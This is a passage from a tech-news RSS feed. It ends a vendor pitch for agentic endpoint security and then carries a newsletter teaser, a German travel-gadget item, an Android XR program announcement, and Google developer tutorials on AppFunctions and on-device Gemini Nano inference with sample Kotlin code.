<p class="wp-block-paragraph">Developers prioritize speed, often allowing software packages to auto-update on their endpoints the moment a new version appears. Attackers weaponize this supply chain vulnerability, as seen in the May 2026 Team PCP attack where 3,800 GitHub repositories were compromised in just 36 minutes via poisoned auto-updates. Securing agentic endpoints against these rapid breaches requires behavior-based inspection within the active workspace context. Koi operates at this layer by providing safe deployment buffers that automate version cooldowns, blocking bleeding-edge updates until they are vetted. By continuously auditing process creation within the IDE runtime, Koi instantly drops unauthorized remote connections before malicious payloads can exfiltrate credentials from the endpoint.  </p>



<p class="wp-block-paragraph"><strong>#4. Enforce principle of least privilege for AI agents</strong></p>



<p class="wp-block-paragraph">AI coding assistants inherit the privileges of whoever deployed them. In practice, that means read access to production databases, write access to core repositories, and access to every secret in environment files and configuration directories. To restrict this excessive access, Koi applies dynamic sandboxing directly to AI agent processes at the kernel level. It enforces a strict zero-trust boundary that segregates sensitive workspace vectors, preventing agents from pulling data outside their approved scope without interrupting developer workflows.</p>



<p class="wp-block-paragraph"><strong>#5. Maintain continuous endpoint posture management</strong></p>



<p class="wp-block-paragraph">Signature-based scanning only stops known threats. Sophisticated repository attacks often arrive as functional, high-rated software that carries no known bad signature. Koi’s research into the <a href="https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers" target="_blank" rel="noreferrer noopener">DarkSpectre campaign</a> found eight browser extensions, all carrying “featured” badges from Google and Microsoft, installed by over 8 million users, silently harvesting every conversation from ChatGPT, Claude, and Gemini in the background. Koi addresses this by operating upstream: scanning marketplace listings every hour, using LLM-driven code analysis to compare what software promises against what its code does, sandboxing it, and scoring the risk before it ever reaches the endpoint.</p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">Securing the modern enterprise is no longer about patching individual gaps. As AI agents redefine the workforce, Agentic Endpoint Security (AES) is now a strategic imperative for every CISO. By establishing a mandatory control plane for the AI-native workspace, AES ensures that your organization can scale engineering velocity without ever compromising enterprise integrity. </p>



<p class="wp-block-paragraph">Ready to secure the future of your software stack? See how <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security" target="_blank" rel="noreferrer noopener">Koi Agentic Endpoint Security</a> delivers complete visibility, risk scoring, and real-time prevention across every endpoint in your enterprise.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Folding and flipping phones are getting seriously good]]></title>
<description><![CDATA[Hi, friends! Welcome to Installer No. 137, your guide to the best and Verge-iest stuff in the world. (If you're new here, welcome, happy phone season, and also you can read all the old editions at the Installer homepage.) This week, I've been reading about Google Zero and armored cars for rich pe...]]></description>
<link>https://tsecurity.de/de/3693909/it-nachrichten/folding-and-flipping-phones-are-getting-seriously-good/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693909/it-nachrichten/folding-and-flipping-phones-are-getting-seriously-good/</guid>
<pubDate>Sat, 25 Jul 2026 14:12:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hi, friends! Welcome to Installer No. 137, your guide to the best and Verge-iest stuff in the world. (If you're new here, welcome, happy phone season, and also you can read all the old editions at the Installer homepage.) This week, I've been reading about Google Zero and armored cars for rich people, watching a […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Stilvoll und sicher Verreisen]]></title>
<description><![CDATA[Stilvoll und sicher Verreisen

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Sa., 25.07.2026 - 07:00


            Die Koffer sind gepackt, der Sommerurlaub ruft, und irgendwo zwischen Sonnencreme und Steckd...]]></description>
<link>https://tsecurity.de/de/3693688/server/stilvoll-und-sicher-verreisen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693688/server/stilvoll-und-sicher-verreisen/</guid>
<pubDate>Sat, 25 Jul 2026 11:03:24 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Stilvoll und sicher Verreisen</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/goodie-stilvoll-sicher-reisen-rfid-reisepass-star-trek"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/goodie-passhuelle-star-trek.jpg?itok=bdbREIZz" width="480" height="319" alt='Dunkelblaue Passhülle aus Kunstleder mit goldener Aufschrift "Passport", darunter ein Emblem mit Lorbeerkranz und Sternenfeld sowie der Schriftzug "United Federation of Planets".' title="Sieht nach Weltraumflotte aus, schützt aber ganz irdisch vor RFID-Zugriff. (Quelle: getdigital.de)" typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-07-25T07:00:00+02:00" title="Samstag, Juli 25, 2026 - 07:00" class="datetime">Sa., 25.07.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Die Koffer sind gepackt, der Sommerurlaub ruft, und irgendwo zwischen Sonnencreme und Steckdosenadapter liegt auch der Reisepass bereit. Mit dieser Hülle im Design einer bekannten interstellaren Weltraumflotte reist der Ausweis diesen Sommer nicht nur sicher, sondern auch mit deutlich mehr Stil.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/goodie-stilvoll-sicher-reisen-rfid-reisepass-star-trek" rel="tag" title="Stilvoll und sicher Verreisen" hreflang="en">Weiterlesen<span class="visually-hidden"> über Stilvoll und sicher Verreisen</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build for the future with the Android XR Developer Catalyst Program — Apply now!]]></title>
<description><![CDATA[Posted by Android XR Team


  The Android XR ecosystem is expanding, and we’re committed to supporting developers who will build its next great experiences. Today, we’re opening applications for the Android XR Developer Catalyst Program, a dedicated initiative to accelerate the development of And...]]></description>
<link>https://tsecurity.de/de/3693515/android-tipps/build-for-the-future-with-the-android-xr-developer-catalyst-program-apply-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693515/android-tipps/build-for-the-future-with-the-android-xr-developer-catalyst-program-apply-now/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:51 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY7FqaPopxHI3Dq1hBDIMB81rZ59f1qF4MjvryAoYitMFpbQNgi6PElj8QSUNHHIZSmv1aX4Dt-UMAmoGtmowcpd4gf-TWNdKEPk_eeCErg7O5X3GwIKw4GZ4x06iJERPYHik0QPuO50LiMyiLxzCVgm-gFUJfUBAjFqRlrUnJgNV7NwnYZYyrr7_t0M0/s2048/GoogleForDevelopers-AndroidText-StrapiMetacard-2048x1323.png">




<div class="separator">Posted by Android XR Team</div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK-8uaBuG-Xdug5wfik0xw8C-Nhyphenhyphenj5-Z7tHoQjxeFwH-5qqg2OB2DSGMHgHFd_372Fx_tREZxL51mDBFJEGMpc5eH9bH-7461bXKEXZgefVhPAmAU8Ehvk8_zpnkhODFFI51tyrJMnoudf3a6b9sCfEqcJoZ-idYpBVVUet8Ehc2gUR30R2D8ADSS-RdE/s4209/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK-8uaBuG-Xdug5wfik0xw8C-Nhyphenhyphenj5-Z7tHoQjxeFwH-5qqg2OB2DSGMHgHFd_372Fx_tREZxL51mDBFJEGMpc5eH9bH-7461bXKEXZgefVhPAmAU8Ehvk8_zpnkhODFFI51tyrJMnoudf3a6b9sCfEqcJoZ-idYpBVVUet8Ehc2gUR30R2D8ADSS-RdE/s16000/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"></a></div><br><div><br></div>
<div><br></div>
<div>
  <p dir="ltr">The Android XR ecosystem is expanding, and we’re committed to supporting developers who will build its next great experiences. Today, we’re opening applications for the <a href="http://developer.android.com/develop/xr/catalyst">Android XR Developer Catalyst Program</a>, a dedicated initiative to accelerate the development of Android XR apps ready to launch within the next year.</p>
  
  <p dir="ltr">This program is designed to provide the resources, hardware, and grants to help you build and scale innovative experiences across <a href="https://developer.android.com/develop/xr/devices#xr-glasses">wired XR glasses</a>, like <a href="https://www.xreal.com/us/aura">XREAL’s Project Aura</a>, and <a href="https://developer.android.com/develop/xr/devices#audio-display">intelligent eyewear</a> (audio and display glasses). We are especially interested in seeing innovative experiences across media, gaming, productivity, and health, but we welcome any unique use case that helps users expand what's possible.</p>
  
  <h3 dir="ltr">Why join the catalyst program?</h3>
  
  <p dir="ltr">We want to help developers navigate common barriers to entry for XR development by providing:</p>
  
  <ul>
    <li dir="ltr">
      <p dir="ltr"><strong>Development Kits:</strong> Get early access to hardware development kits for wired XR glasses (XREAL’s Project Aura) and / or intelligent eyewear (audio and display glasses).</p>
    </li>
    <li dir="ltr">
      <p dir="ltr"><strong>Technical support:</strong> Gain access to specialized technical resources and support forums specifically designed to help you prepare your app for Google Play.</p>
    </li>
    <li dir="ltr">
      <p dir="ltr"><strong>Grant Opportunities:</strong> Submit a request and you may be eligible to receive a non-recoupable grant to accelerate your development.</p>
    </li>
  </ul>
  
  <h3 dir="ltr">Ready to start building?</h3>
  
  <p dir="ltr">Applications are open to developers looking to publish apps for the Android XR ecosystem in the next 6-12 months. You can build with Kotlin and the <a href="https://developer.android.com/develop/xr/jetpack-xr-sdk">Jetpack XR SDK</a>, or with <a href="https://developer.android.com/develop/xr/unity">Unity</a>, <a href="https://developer.android.com/develop/xr/unreal">Unreal Engine</a> or <a href="https://developer.android.com/develop/xr/godot">Godot</a>. If you need a spark of inspiration, you can check out existing XR <a href="https://developer.android.com/develop/xr/experiments">Experiments</a> and <a href="https://developer.android.com/develop/xr/samples">Samples</a> to see how you can use the SDK for everything from spatial music to navigation.</p>
  
  <p dir="ltr">Once you have your concept ready, be sure to <a href="http://developer.android.com/develop/xr/catalyst">submit your application</a> by June 30th by 11:59PM PDT. We can’t wait to see what you build.</p>
  
  <p dir="ltr"><strong><a href="http://developer.android.com/develop/xr/catalyst">Start Your Application</a></strong></p><p dir="ltr">Explore this announcement and all Google I/O 2026 updates on <span></span><a href="https://io.google/2026/?utm_source=blogpost&amp;utm_medium=pr&amp;utm_campaign=devblogs&amp;utm_content=" rel="noopener nofollow noreferrer" target="_blank">io.google<span></span></a>.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: Integrate into Android's intelligence system using AppFunctions]]></title>
<description><![CDATA[Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our previous post, we explored...]]></description>
<link>https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:27 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s2469/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png"><p></p><p><i>Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer Relations</i></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s8583/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s1600/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"></a></div><br><p><br></p><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our <a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">previous post</a>, we explored how to leverage Firebase AI Logic to build cloud-hosted and hybrid AI features.</p>Traditional mobile UIs excel at focused, hands-on tasks, and the Android intelligence system is introducing complementary features to make complex, multi-step actions even easier. By supplementing traditional user interfaces, AppFunctions provide a powerful new entry point: A privileged agent on the device can access app features in the background. This can be particularly helpful when users are driving, walking or otherwise multitasking. 

<p>In this article, we'll show you how we designed and integrated these capabilities into our travel planning app, <a href="https://github.com/android/ai-samples/tree/main/jetpacker">JetPacker</a>, using Android AppFunctions. We'll explore the rationale behind our feature choices, discuss the specialized tooling we used to accelerate development, and dive into the code that makes it all work.</p>

<h2>Designing AI-ready features: making choices that matter for your users</h2>

<p>To select which features to provide to the intelligence system, we looked for tasks where a voice or text command is objectively faster than tapping through screens. In this side-by-side screen recording you can see this contrast perfectly: on the left, a user tapping through multiple screens to log an expense; on the right, the same task completed instantly in the background via a privileged agent.</p>

<div class="vertical-video-grid">
  <div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s960/Comp%201.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s1600/Comp%201.gif"></a></div><br><div class="vertical-video-wrapper"><br></div>

<p>Our first choice was expense tracking. Logging a coffee expense during a trip usually takes quite a few taps—unlocking the phone, opening the app, finding the active trip, navigating to the expenses tab, tapping the add button, taking a picture of the receipt, and checking the result. By providing the <code>addExpense</code> and <code>getExpenses</code> features as AppFunctions, the system agent handles the heavy lifting. When the user says, "Add a five-dollar coffee expense to my Paris trip," the agent automatically searches for the correct trip ID in the background and inserts the expense, skipping the manual UI flow entirely.</p>

<p>We also prioritized itinerary management. Finding what activity is next on a busy trip itinerary usually requires scrolling through a dense timeline view. By providing <code>getItinerary</code> and <code>addItineraryEvent</code> to the system, the user can simply ask, "What am I doing next in Paris?" and get an immediate answer.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s960/Comp%202.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s1600/Comp%202.gif"></a></div><br><p><br></p>
  

<p>Finally, we focused on hands-free note capturing. Typing out reminders or notes while walking down a busy street is difficult and unsafe. Exposing a voice note capability allows the user to say, "The flight was amazing, I saw a beautiful sunset and managed to sleep well," and the privileged agent automatically transcribes and saves it directly into the travel database <span face="Roboto, sans-serif"> using the </span><span>addVoiceNote</span><span face="Roboto, sans-serif"> AppFunction.</span></p>

<h2>Android MCP powered by AppFunctions</h2>This entire experience is built on Android MCP. Under this design, the app acts as a local MCP server. Rather than remote APIs, you provide your app features directly to the on-device intelligence system.<br><br><a href="https://d.android.com/ai/appfunctions">Android AppFunctions</a> is the API that brings this concept to life. It reads annotated Kotlin functions and compiles them into type-safe, sandboxed tool definitions that the privileged agent can discover and invoke locally on the device.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s2500/Android%20MCP%20diagram.png"><img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s1600/Android%20MCP%20diagram.png"></a></div><br><p><br></p>

<p><br></p><p><br></p><p><br></p><p><br></p><p><br></p><i><div><i>Diagram highlighting our apps, the android platform, and system agents coordinate AppFunctions.</i></div></i><p>Under the Android MCP model, your app acts as a local MCP server that exposes structured tools, while the Android platform serves as the central tool registry. On the MCP client side, agent apps are registered with the intelligence system after being granted system-privileged permissions to access the registry.</p>

<p>When a user interacts with a registered agent, its LLM determines if the request can be handled by an AppFunction, queries the platform's metadata, and executes the appropriate registered functions in the background. This local MCP client-server design gives you full control: you choose exactly which features are accessible to the agent, keeping the rest of your app's data private.</p>

<h2>How we accelerated development with Android skills</h2>

To streamline the integration process, we leveraged the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a>. The AppFunctions development skill is a complete development companion. It guided us through the entire lifecycle: mapping Kotlin data classes to serialize parameters, generating the necessary <code>Service</code> entry points, refining our <code>KDoc</code> documentation to ensure the LLM understands parameter boundaries, and setting up automated testing using ADB.

<h2>Providing app features to the intelligence system</h2>

<p>Enough with the theory, let's dive into the implementation.</p>

<h4>Configuration and dependency setup</h4>

<p>We begin by adding the AppFunctions dependencies. One for the API and one for the Kotlin Symbol Processing compiler.</p>

<pre><code>implementation("androidx.appfunctions:appfunctions:1.0.0-alpha10")
ksp("androidx.appfunctions:appfunctions-compiler:1.0.0-alpha10")</code></pre>

<h4>Modeling custom data types</h4>

<p>Any custom object exchanged with the agent must be annotated with <code>@AppFunctionSerializable</code>. In our <a href="https://github.com/android/ai-samples/tree/main/jetpacker/android/feature/appfunctions/src/main/java/com/example/jetpacker/feature/appfunctions/TripSerializable.kt">TripSerializable.kt</a> file, we define our trip data model:</p>

<pre><code>@AppFunctionSerializable(isDescribedByKDoc = true)
data class TripSerializable(
    /** The trip's unique identifier. */
    val id: String,
    /** The trip's title. */
    val title: String,
    /** The trip's destination location. */
    val location: String,
    /** The trip's start date in milliseconds. */
    val startDate: Long,
    /** The trip's end date in milliseconds. */
    val endDate: Long,
    /** A list of participants. */
    val participants: List&lt;String&gt;,
)</code></pre>

<h4>Providing features using the @AppFunction annotation</h4>

<p>Next, the skill wrote the Kotlin functions that perform the database queries and annotate them with <code>@AppFunction</code>. We can view this in searchTrip:</p>

<pre><code>/**
 * Looks for trips based on optional filters like id, title (name), location, and dates.
 *
 * @param id The unique identifier of the trip.
 * @param title The title or name of the trip.
 * @param location The destination location.
 * @param startDate The minimum start date in milliseconds.
 * @param endDate The maximum end date in milliseconds.
 * @return A list of trips matching the filters.
 */
@AppFunction(isDescribedByKDoc = true)
suspend fun searchTrip(
    id: String? = null,
    title: String? = null,
    location: String? = null,
    startDate: Long? = null,
    endDate: Long? = null
): List&lt;TripSerializable&gt; {
    return withContext(Dispatchers.IO) {
    // implementation
}</code></pre>

<p>Since AppFunctions run on the UI thread by default, we use <code>withContext(Dispatchers.IO)</code> to switch to a background dispatcher. Additionally, we refine our KDoc to use clear, imperative verbs and specify parameter constraints. This documentation compiles directly into the tool's schema, which the privileged agent uses to resolve parameters and handle runtime errors.</p>

<h4>The service entry point and Hilt integration</h4>

<p>To register these features with the intelligence system, we create an abstract base class that extends <code>AppFunctionService</code>. We annotate it with <code>@AppFunctionServiceEntryPoint</code>:</p>

<pre><code>@RequiresApi(36)
@AndroidEntryPoint
@AppFunctionServiceEntryPoint(
    serviceName = "JetPackerAppFunctionService",
    appFunctionXmlFileName = "jetpacker_app_function_service"
)
abstract class BaseJetPackerAppFunctionService : AppFunctionService() {
    @Inject internal lateinit var tripDao: TripDao
    // DAOs and database references are injected here...
}</code></pre>

<p>During compilation, KSP generates the final concrete service subclass, <code>JetPackerAppFunctionService</code>, as declared with the <code>serviceName</code> parameter. We also register <code>app_metadata.xml</code> in the app's manifest. This file provides global operational rules for JetPacker's declared AppFunctions.</p>

<h2>Testing and verifying your AppFunctions</h2>

<p>Once implemented, you should verify that your AppFunctions are registered and working correctly.</p>

<p>Running devices or emulators with Android 17 or newer, you can use ADB commands from your terminal to list and invoke your functions. Running <code>adb shell cmd app_function list-app-functions</code> displays all registered functions for your package. You can then execute a specific function and test its database integration by running <code>adb shell cmd app_function execute-app-function</code> while passing a raw JSON parameters string.</p>

<p>Instead of these ADB commands, you can also use the <a href="https://github.com/android/appfunctions">AppFunctions Testing Agent</a> to inspect your configuration, list and execute AppFunctions, and even see how your AppFunctions behave in a real conversational flow.</p>

<h2>Wrapping it up</h2>

<p>When thinking about app features that can be contributed to the intelligence system using AppFunctions requires a slight shift in how we think about code and documentation. AppFunctions enable you to use this new interaction model for apps, which allows using an agent to access app features..</p>

<p>First, the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a> is an essential lifecycle tool, helping you discover features, implement and refine AppFunctions for your apps. Second, KDoc comments are a compiled API asset; clear parameter descriptions directly impact the execution accuracy of the system agent. Finally, Android MCP provides local-first execution allowing apps to safely collaborate with AI agents.</p>

<p>Contributing app features through AppFunctions makes your application ready for the intelligence system. Let us know how you are adapting your apps for the agentic era!</p>

<h2>Learn more</h2>

<p>Check out the other parts of this blog post series:<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html">Part 1:</a></b> Introduction of the app and a high-level overview.<br><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"><b>Part 2:</b></a> On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">Part 3:</a></b> Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"><b>Part 4 (this post!):</b></a> System integration. Integrating with the Android intelligence system using AppFunctions. <br>Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.</p>

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>
  All code snippets in this blog post follow the following copyright notice:
</p>
<pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: On-device inference]]></title>
<description><![CDATA[Posted by Caren Chang, Developer Relations Engineer, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our previous post we introduced Jet...]]></description>
<link>https://tsecurity.de/de/3693497/android-tipps/build-intelligent-android-apps-on-device-inference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693497/android-tipps/build-intelligent-android-apps-on-device-inference/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:25 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7g4aJ0ZhzVcuPr3SzBJIVQ_MZT3hIXb1Ff8SVjjrvRjYzZwhgoE7IbHryS6Ds7u7if1_tmVmMdkFNAtPADXoeuRQ_64Pxfnp3oq2aHR8hbS3fDExGxE0nSiOvXPw7SonhNdjFNI2eDJfasEEMs0xjh2gZlyPq6ToimvFlaMv2-nVDz_XLnSXK1iCn4U/s2469/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Meta%20v02.png"><div><i>Posted by Caren Chang, Developer Relations Engineer, Android Developer Relations</i></div><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIU-6haqWEXnugbhG5is8t1TU0tN3EkfSc7GwvHMRsMSU14k-P7q4il_nJlGk-qNP_PG3aKs1LDWNgWKqhFsG6Q16v2zeoHMvqY_PesC5ddxHRjTGgtiQ33uvOrUIPkSdUgFfBIYSkqBhcuZJTY8jbW0mOjKs8XF8DLxfyD7CjJ1Sd4FM7AUrufTnSEVw/s8582/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Blog%20v02.png"><img border="0" data-original-height="2601" data-original-width="8582" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIU-6haqWEXnugbhG5is8t1TU0tN3EkfSc7GwvHMRsMSU14k-P7q4il_nJlGk-qNP_PG3aKs1LDWNgWKqhFsG6Q16v2zeoHMvqY_PesC5ddxHRjTGgtiQ33uvOrUIPkSdUgFfBIYSkqBhcuZJTY8jbW0mOjKs8XF8DLxfyD7CjJ1Sd4FM7AUrufTnSEVw/s1600/0625%20Building%20JetPacker%20with%20Intelligent%20On-Device%20features_Blog%20v02.png"></a></div><br><i><br></i><div><i><br></i><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a <b>personalized, intelligent, </b>and <b>agentic </b>experience. In our <a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">previous post we introduced Jetpacker</a>, the demo app we'll use throughout this series.</p>

<p>In this blog post, we will share how you can use Gemini Nano through <a href="https://developers.google.com/ml-kit/genai/prompt/android">ML Kit’s Prompt API</a> to build intelligent on-device features.</p>
<div>
  
  
</div>

<p>Building intelligent on-device features refers to the ability to process prompts and data directly on a device without sending data to a server. This offers a few advantages:</p>
<ul>
  <li>User data can be processed <b>locally</b> on the device, preserving user privacy</li>
  <li>Functionality of the model is <b>reliable</b> even with spotty or no internet connection</li>
  <li>No additional cloud inference <b>cost</b>, since everything runs on the user’s hardware</li>
</ul>

<p>With the benefits of on-device in mind, we identified three features to add in Jetpacker that can improve the user experience: summarizing trip itineraries, managing expenses, and capturing voice notes.</p>

